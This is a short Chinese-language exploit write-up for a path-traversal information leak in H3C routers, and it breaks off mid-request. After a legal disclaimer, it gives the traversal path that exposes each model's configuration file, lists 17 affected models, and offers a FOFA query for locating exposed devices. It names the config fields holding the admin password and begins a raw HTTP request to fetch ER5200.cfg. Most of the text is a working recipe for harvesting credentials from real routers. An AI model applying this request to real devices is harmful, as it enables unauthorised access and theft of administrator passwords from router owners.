H3C路由器userLogin.asp信息泄漏漏洞

免责申明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

漏洞概述

该漏洞为华三路由器(家用路由器)的漏洞,漏洞覆盖多种类型的家用路由器,很多师傅文章只提及一类,近期将遇到的类型补充如下,漏洞路径 /userLogin.asp/../actionpolicy_status/../xxxxxxx.cfg 文件名为各个版本对应的型号名称

漏洞影响版本

    - ER2100V2
    - ER2100
    - ER2200G2
    - ER3100G2
    - ER3100
    - ER3108GW
    - ER3108G
    - ER3200G2
    - ER3200
    - ER3260G2
    - ER5100G2
    - ER5100
    - ER5200G2
    - ER5200
    - ER6300G2
    - ER8300G2-X
    - ER8300G2

网络资产测绘

fofa:app=“H3C-Ent-Router”

漏洞复现步骤

部分路由器型号中,获取密码位置为"vtypasswd",还有部分密码位置为"ADMPWD"

GET /userLogin.asp/../actionpolicy_status/../ER5200.cfg HTTP/1.1
Host: 192.168.1.1
User-Ag